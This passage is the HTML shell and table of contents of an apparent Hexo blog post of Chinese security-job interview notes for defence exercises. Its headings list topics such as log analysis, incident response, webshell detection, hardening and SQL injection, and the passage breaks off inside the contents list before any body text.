<!DOCTYPE html>
<html lang="en">
    <head>
        
    
    <link rel='stylesheet' href="/./css/dracula.css">

        <title>hw面试</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=2.0">
<link rel="stylesheet" href="/css/style.css">
<link rel="shortcut icon" href="/favicon.ico">
<link rel="apple-touch-icon" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="manifest" href="/site.webmanifest">

    <meta name="generator" content="Hexo 6.3.0"></head>
    <body>
        <header class="al_header al_pos_fixed">
    <div class="al_header_container dis_flex_jcenter">
        <div class="al_header_container_left">
            <div class="al_header_site_title">
                <a href="/">Hexo</a>
            </div>
        </div>

        <div class="dis_flex_jcenter">
            <div class="al_header_setting">
                <svg class="al_header_icon">
                    <use xmlns="http://www.w3.org/2000/svg" xlink:href="/assets/svg_icons.svg#svg-menu"></use>
                </svg>
            </div>
        </div>
    </div>
</header>

        <div class="al_sidebar">

    <div class="al_sidebar_overlay al_full_cover"></div>

    <div class="al_pos_fixed al_sidebar_cnt">
        <div class="dis_flex_acenter al_sidebar_header">
            <h3>Hexo</h3>
            <div class="al_sidebar_close al_header_setting">
                <svg class="al_header_icon">
                    <use xmlns="http://www.w3.org/2000/svg" xlink:href="/assets/svg_icons.svg#svg-close"></use>
                </svg>
            </div>
        </div>

        <div class="al_sidebar_author_cnt">

            <div class="al_sidebar_author_info">
                <h4>John Doe</h4>
                <img class="al_sidebar_avatar" src="https://yourAvatorURL">
                <p></p>
            </div>

            
        </div>
    </div>
</div>

        
    <div class="dis_flex_center al_lightbox_cnt al_full_cover">
        <img class="al_lightbox_img"/>
    </div>
    <div class="al_page_background dis_flex_center al_full_cover"></div>
    <div class="al_page_container">
        <div class="al_pos_ab al_fake_background"></div>
        <div class="al_main_container al_shadow al_main_page_container">
            <article class="al_article">
                <header>
                    <h1 class="al_page_title">
                        hw面试
                    </h1>
                    <div class="al_page_info dis_flex">
                        <div class="al_page_content_info">
                            Wed July 12, 2023 10:48 AM
                        </div>

                        

                        
                        <span class="tags"></span>
                    </div>
                </header>

                
                    <div class="al_page_content_outline">
                        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B5%81%E9%87%8F"><span class="toc-text">流量</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%8E%E4%B9%88%E7%A1%AE%E5%AE%9A%E6%98%AF%E7%9C%9F%E5%AE%9E%E6%94%BB%E5%87%BB%E8%BF%98%E6%98%AF%E8%AF%AF%E6%8A%A5"><span class="toc-text">怎么确定是真实攻击还是误报</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#struts2%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9A%84%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="toc-text">struts2命令执行的流量特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B0%88%E8%B0%88%E8%9A%81%E5%89%91-x2F-%E8%8F%9C%E5%88%80-x2F-%E5%86%B0%E8%9D%8E-x2F-%E5%93%A5%E6%96%AF%E6%8B%89%E7%9A%84%E7%89%B9%E5%BE%81"><span class="toc-text">谈谈蚁剑&#x2F;菜刀&#x2F;冰蝎&#x2F;哥斯拉的特征</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%9C%89%E5%93%AA%E4%BA%9B%E5%B8%B8%E8%A7%81%E7%9A%84%E7%89%B9%E5%BE%81"><span class="toc-text">SQL注入有哪些常见的特征</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BA%AF%E6%BA%90"><span class="toc-text">溯源</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BA%AF%E6%BA%90%E6%96%B9%E6%B3%95%E4%BB%A5%E5%8F%8A%E4%BB%8B%E7%BB%8D"><span class="toc-text">溯源方法以及介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%81%E9%87%8F%E6%BA%AF%E6%BA%90"><span class="toc-text">流量溯源</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%99%85%E6%83%85%E5%86%B5%E7%9A%84%E6%BA%AF%E6%BA%90"><span class="toc-text">实际情况的溯源</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%97%A5%E5%BF%97"><span class="toc-text">日志</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%99%E4%BD%A0%E4%B8%80%E4%B8%AA%E6%AF%94%E8%BE%83%E5%A4%A7%E7%9A%84%E6%97%A5%E5%BF%97%EF%BC%8C%E5%BA%94%E8%AF%A5%E5%A6%82%E4%BD%95%E5%88%86%E6%9E%90"><span class="toc-text">给你一个比较大的日志，应该如何分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%A0%E8%83%BD%E5%A4%A7%E6%A6%82%E8%AF%B4%E4%B8%80%E4%B8%8B%EF%BC%8C%E6%AF%94%E5%A6%82%E6%95%B0%E6%8D%AE%E5%8C%85%E6%88%96%E8%80%85%E6%97%A5%E5%BF%97%EF%BC%8C%E4%BD%A0%E7%9A%84%E5%88%86%E6%9E%90%E6%80%9D%E8%B7%AF%E6%98%AF%E4%BB%80%E4%B9%88"><span class="toc-text">你能大概说一下，比如数据包或者日志，你的分析思路是什么</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%92%8C%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%8C%E6%9C%89%E7%9C%8B%E8%BF%87%E7%9B%B8%E5%85%B3%E6%97%A5%E5%BF%97%E5%90%97"><span class="toc-text">文件上传和命令执行，有看过相关日志吗</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%8D%E5%8A%A1%E4%B8%AD%E4%BA%86webshell%E6%80%8E%E6%A0%B7%E4%BB%8E%E6%97%A5%E5%BF%97%E6%89%BEwebshell%E4%BD%8D%E7%BD%AE%EF%BC%8C%E8%A2%AB%E6%8B%BFshell%E5%90%8E%E6%80%8E%E4%B9%88%E5%BA%94%E6%80%A5%EF%BC%8C%E6%80%8E%E6%A0%B7%E5%BF%AB%E9%80%9F%E5%AE%9A%E4%BD%8Dshell"><span class="toc-text">服务中了webshell怎样从日志找webshell位置，被拿shell后怎么应急，怎样快速定位shell</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E7%BD%91"><span class="toc-text">内网</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%81%E7%A8%8B%EF%BC%9A"><span class="toc-text">内网渗透流程：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">主机信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%9F%E5%86%85%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">域内信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E7%8E%AF%E5%A2%83%E4%B8%8D%E5%87%BA%E7%BD%91"><span class="toc-text">内网环境不出网</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%8A%A5%E8%AD%A6%E4%BA%86%E6%80%8E%E4%B9%88%E5%8A%9E"><span class="toc-text">内网报警了怎么办</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94"><span class="toc-text">应急响应</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BD%91%E7%AB%99%E8%A2%AB%E6%8C%82%E9%A9%AC%E5%A6%82%E4%BD%95%E5%BA%94%E6%80%A5"><span class="toc-text">网站被挂马如何应急</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%BE%E5%A4%87%E6%8A%A5%E8%AD%A6%EF%BC%8CSQL%E6%B3%A8%E5%85%A5%E7%9A%84%E6%8A%A5%E8%AD%A6%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%98%AF%E7%9C%9F%E5%AE%9E%E6%94%BB%E5%87%BB%EF%BC%8C%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD%E4%BB%96%E6%94%BB%E5%87%BB%E6%98%AF%E5%90%A6%E6%88%90%E5%8A%9F%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%88%90%E5%8A%9F%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86"><span class="toc-text">设备报警，SQL注入的报警，如果是真实攻击，怎么判断他攻击是否成功，如果成功怎么处理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-1"><span class="toc-text">应急响应</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%8A%A4%E7%BD%91%E7%BB%8F%E5%8E%86"><span class="toc-text">护网经历</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E5%8E%86%E6%9C%89%E6%8A%A4%E7%BD%91%E7%BB%8F%E5%8E%86%EF%BC%8C%E4%BD%A0%E8%83%BD%E8%B0%88%E8%B0%88%E6%8A%A4%E7%BD%91%E7%9A%84%E6%83%85%E5%86%B5%E5%90%97"><span class="toc-text">简历有护网经历，你能谈谈护网的情况吗</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%93%9D%E9%98%9F%E7%A0%94%E5%88%A4"><span class="toc-text">蓝队研判</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7"><span class="toc-text">安全工具</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%A5%E4%BE%B5%E9%98%B2%E5%BE%A1%E7%B3%BB%E7%BB%9FIPS"><span class="toc-text">入侵防御系统IPS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%A5%E4%BE%B5%E6%A3%80%E6%B5%8B%E7%B3%BB%E7%BB%9FIDS"><span class="toc-text">入侵检测系统IDS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E7%81%AB%E5%A2%99"><span class="toc-text">防火墙</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AE%A1%E8%AE%A1%E7%B3%BB%E7%BB%9F"><span class="toc-text">数据库审计系统</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A5%E5%BF%97%E5%AE%A1%E8%AE%A1%E7%B3%BB%E7%BB%9F"><span class="toc-text">日志审计系统</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A0%A1%E5%9E%92%E6%9C%BA"><span class="toc-text">堡垒机</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E7%B3%BB%E7%BB%9F"><span class="toc-text">漏洞扫描系统</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E5%AE%89%E5%85%A8%E6%80%81%E5%8A%BF%E6%84%9F%E7%9F%A5%E5%B9%B3%E5%8F%B0"><span class="toc-text">数据安全态势感知平台</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F"><span class="toc-text">终端安全管理系统</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WAF"><span class="toc-text">WAF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%9C%9C%E7%BD%90"><span class="toc-text">蜜罐</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WAF%E5%92%8CIPS%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-text">WAF和IPS的区别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CS%E6%98%AF%E4%BB%80%E4%B9%88%E4%B8%9C%E8%A5%BF%EF%BC%8C%E7%9F%A5%E9%81%93%E6%80%8E%E4%B9%88%E4%BD%BF%E7%94%A8%E5%90%97%EF%BC%9F"><span class="toc-text">CS是什么东西，知道怎么使用吗？</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8A%A0%E5%9B%BA"><span class="toc-text">加固</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#linux%E5%AE%89%E5%85%A8%E5%8A%A0%E5%9B%BA"><span class="toc-text">linux安全加固</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#windows-%E5%AE%89%E5%85%A8%E5%8A%A0%E5%9B%BA"><span class="toc-text">windows 安全加固</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%8A%A0%E5%9B%BA%E6%96%B9%E6%B3%95%EF%BC%9F"><span class="toc-text">文件上传加固方法？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%8A%A0%E5%9B%BA%E6%96%B9%E6%B3%95%EF%BC%9F"><span class="toc-text">暴力破解加固方法？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Sql%E6%B3%A8%E5%85%A5%E5%8A%A0%E5%9B%BA%E6%8E%AA%E6%96%BD%EF%BC%9F"><span class="toc-text">Sql注入加固措施？</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%92%8Cwebshell%E6%9C%89%E5%85%B3"><span class="toc-text">和webshell有关</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E7%9A%84Webshell%E6%A3%80%E6%B5%8B%E5%B7%A5%E5%85%B7"><span class="toc-text">常用的Webshell检测工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A1%AE%E5%AE%9A%E7%BA%A2%E9%98%9F%E5%9C%A8%E6%89%93%E6%9C%8D%E5%8A%A1%E5%99%A8%EF%BC%8C%E8%80%8C%E4%B8%94%E8%BF%9B%E8%A1%8C%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%9A%84%E6%93%8D%E4%BD%9C%EF%BC%8C%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD%E6%98%AF%E4%B8%8D%E6%98%AFwebshell"><span class="toc-text">确定红队在打服务器，而且进行文件上传的操作，怎么判断是不是webshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="toc-text">无文件Webshell实现的方式有哪些</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9D%83%E9%99%90"><span class="toc-text">权限</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D%E5%87%A0%E7%A7%8D%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E7%9A%84%E6%96%B9%E6%B3%95"><span class="toc-text">介绍几种权限维持的方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#kali%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-text">kali权限提升</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Windows%E5%B8%B8%E7%94%A8%E7%9A%84%E6%8F%90%E6%9D%83%E6%96%B9%E6%B3%95"><span class="toc-text">Windows常用的提权方法</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%A5%E4%BE%B5%E6%8E%92%E6%9F%A5%E5%85%B7%E4%BD%93%E6%B5%81%E7%A8%8B"><span class="toc-text">入侵排查具体流程</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Windows%E5%85%A5%E4%BE%B5%E6%8E%92%E6%9F%A5%E6%80%9D%E8%B7%AF"><span class="toc-text">Windows入侵排查思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux%E5%85%A5%E4%BE%B5%E6%8E%92%E6%9F%A5%E6%80%9D%E8%B7%AF"><span class="toc-text">Linux入侵排查思路</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6"><span class="toc-text">钓鱼邮件</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E5%8F%91%E7%8E%B0%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6"><span class="toc-text">如何发现钓鱼邮件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%81%87%E5%88%B0%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6%E5%A6%82%E4%BD%95%E5%A4%84%E7%BD%AE%EF%BC%9F"><span class="toc-text">遇到钓鱼邮件如何处置？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AF%B4%E8%AF%B4%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6%E5%A4%84%E7%BD%AE%E5%AE%9E%E9%99%85%E6%93%8D%E4%BD%9C"><span class="toc-text">说说钓鱼邮件处置实际操作</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E6%98%AF%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6"><span class="toc-text">如何判断是钓鱼邮件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%88%B0%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6exe%E5%A6%82%E4%BD%95%E5%88%86%E6%9E%90%EF%BC%9F"><span class="toc-text">获取到钓鱼邮件exe如何分析？</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E"><span class="toc-text">中间件漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#linux%E9%87%8D%E8%A6%81%E7%9B%AE%E5%BD%95"><span class="toc-text">linux重要目录</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Liunx%E7%B3%BB%E7%BB%9F%E4%B8%AD%E4%BB%BB%E4%BD%95%E6%9D%83%E9%99%90%E9%83%BD%E8%83%BD%E8%AE%BF%E9%97%AE%E7%9A%84%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6%E4%BD%8D%E7%BD%AE"><span class="toc-text">Liunx系统中任何权限都能访问的临时文件位置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#linux%E6%AF%94%E8%BE%83%E9%87%8D%E8%A6%81%E7%9A%84%E7%9B%AE%E5%BD%95"><span class="toc-text">linux比较重要的目录</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#sqlmap%E7%9A%84%E2%80%93os-shell%E5%8F%82%E6%95%B0%E5%8F%96%E5%BE%97shell"><span class="toc-text">sqlmap的–os-shell参数取得shell</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#FOFA%E8%AF%AD%E6%B3%95"><span class="toc-text">FOFA语法</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Sql%E6%B3%A8%E5%85%A5"><span class="toc-text">Sql注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-%EF%BC%9A"><span class="toc-text">原理 ##：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Sql%E6%B3%A8%E5%85%A5%E5%88%86%E7%B1%BB"><span class="toc-text">Sql注入分类</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="toc-text">报错注入：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%89%8D%E6%8F%90"><span class="toc-text">前提</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0"><span class="toc-text">常用函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E7%B1%BB"><span class="toc-text">分类</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mysql%E9%BB%98%E8%AE%A4%E5%AD%98%E5%9C%A8%E7%9A%84%E5%93%AA%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%8C%E6%B3%A8%E5%85%A5%E6%97%B6%E7%BB%8F%E5%B8%B8%E7%94%A8%E5%88%B0%EF%BC%9F"><span class="toc-text">mysql默认存在的哪个数据库，注入时经常用到？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%B2%E6%B3%A8"><span class="toc-text">盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86%EF%BC%9A"><span class="toc-text">原理：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%B6%E9%97%B4%E5%9E%8B%E7%9B%B2%E6%B3%A8%E7%89%B9%E7%82%B9%EF%BC%9F%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0%EF%BC%9F%E6%98%93%E5%8F%97%E5%88%B0%E4%BB%80%E4%B9%88%E5%BD%B1%E5%93%8D%EF%BC%9F"><span class="toc-text">时间型盲注特点？常用函数？易受到什么影响？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%83%E5%B0%94%E5%9E%8B%E7%9B%B2%E6%B3%A8%E7%89%B9%E7%82%B9-%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0%EF%BC%9F"><span class="toc-text">布尔型盲注特点?常用函数？</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sql%E6%89%8B%E6%B3%A8%E7%9A%84%E4%B8%80%E8%88%AC%E6%AD%A5%E9%AA%A4%EF%BC%9A"><span class="toc-text">sql手注的一般步骤：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="toc-text">宽字节注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Sql%E6%B3%A8%E5%85%A5%E7%BB%95waf%E5%A7%BF%E5%8A%BF-%E4%B8%8D%E7%94%A8%E5%85%A8%E9%83%BD%E8%AF%B4%EF%BC%8C%E8%AF%B4%E5%87%A0%E4%B8%AA%E5%B0%B1%E8%A1%8C"><span class="toc-text">Sql注入绕waf姿势(不用全都说，说几个就行)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E7%BD%91%E7%AB%99%E5%8F%AF%E8%83%BD%E5%AD%98%E5%9C%A8sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%EF%BC%9F"><span class="toc-text">什么样的网站可能存在sql注入漏洞？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%8C%82%E9%A9%AC%E5%88%A9%E7%94%A8%E6%88%90%E5%8A%9F%E7%9A%84%E6%9D%A1%E4%BB%B6%EF%BC%9F%EF%BC%88sql%E6%B3%A8%E5%85%A5%E6%8C%82%E9%A9%AC%EF%BC%89"><span class="toc-text">sql注入漏洞挂马利用成功的条件？（sql注入挂马）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%93%E4%BD%A0%E5%8F%91%E7%8E%B0%E4%B8%80%E4%B8%AA%E7%BD%91%E7%AB%99%E5%AD%98%E5%9C%A8sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%97%B6%EF%BC%8C%E4%BD%A0%E4%BC%9A%E6%80%8E%E4%B9%88%E8%BF%9B%E8%A1%8C%E6%8C%82%E9%A9%AC"><span class="toc-text">当你发现一个网站存在sql注入漏洞时，你会怎么进行挂马?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AF%B4%E4%B8%8B%E6%89%8B%E6%B3%A8%E6%96%B9%E5%BC%8F%E6%8C%82%E9%A9%AC%E7%94%A8%E5%88%B0%E4%BB%80%E4%B9%88%E5%87%BD%E6%95%B0%EF%BC%9F"><span class="toc-text">说下手注方式挂马用到什么函数？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%A0%E4%B8%80%E8%88%AC%E4%BC%9A%E6%80%8E%E4%B9%88%E5%88%A9%E7%94%A8sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%EF%BC%9F"><span class="toc-text">你一般会怎么利用sql注入漏洞？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%A6%82%E4%BD%95%E4%BF%AE%E5%A4%8D"><span class="toc-text">sql注入漏洞如何修复?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Sql%E9%A2%84%E7%BC%96%E8%AF%91%E5%8E%9F%E7%90%86-%EF%BC%88PreparedStatement%EF%BC%89"><span class="toc-text">Sql预编译原理 ##（PreparedStatement）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Sql%E6%B3%A8%E5%85%A5getshell"><span class="toc-text">Sql注入getshell</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="toc-text">文件上传漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-text">(1)文件上传漏洞原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E4%B8%80%E8%88%AC%E4%B8%8A%E4%BC%A0%E4%BB%80%E4%B9%88%E9%A9%AC"><span class="toc-text">(2)文件上传漏洞一般上传什么马?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95waf%E6%96%B9%E5%BC%8F"><span class="toc-text">(3)文件上传绕waf方式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%94%A8%E4%BB%80%E4%B9%88%E5%90%8E%E7%BC%80%E7%9A%84%E9%A9%AC"><span class="toc-text">用什么后缀的马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E9%98%B2%E6%8A%A4"><span class="toc-text">(10)文件上传漏洞防护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95waf"><span class="toc-text">(11)文件上传绕waf</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-text">文件包含漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-text">(1)文件包含漏洞原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%92%8C%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-text">(2)远程文件包含和本地文件包含的区别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-include-include-once-require-require-once%E8%BF%99%E5%87%A0%E4%B8%AA%E5%87%BD%E6%95%B0%E5%8C%BA%E5%88%AB"><span class="toc-text">(3) include,include_once,require,require_once这几个函数区别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-text">(3)文件包含漏洞修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xss%E6%BC%8F%E6%B4%9E%EF%BC%88%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB%EF%BC%89"><span 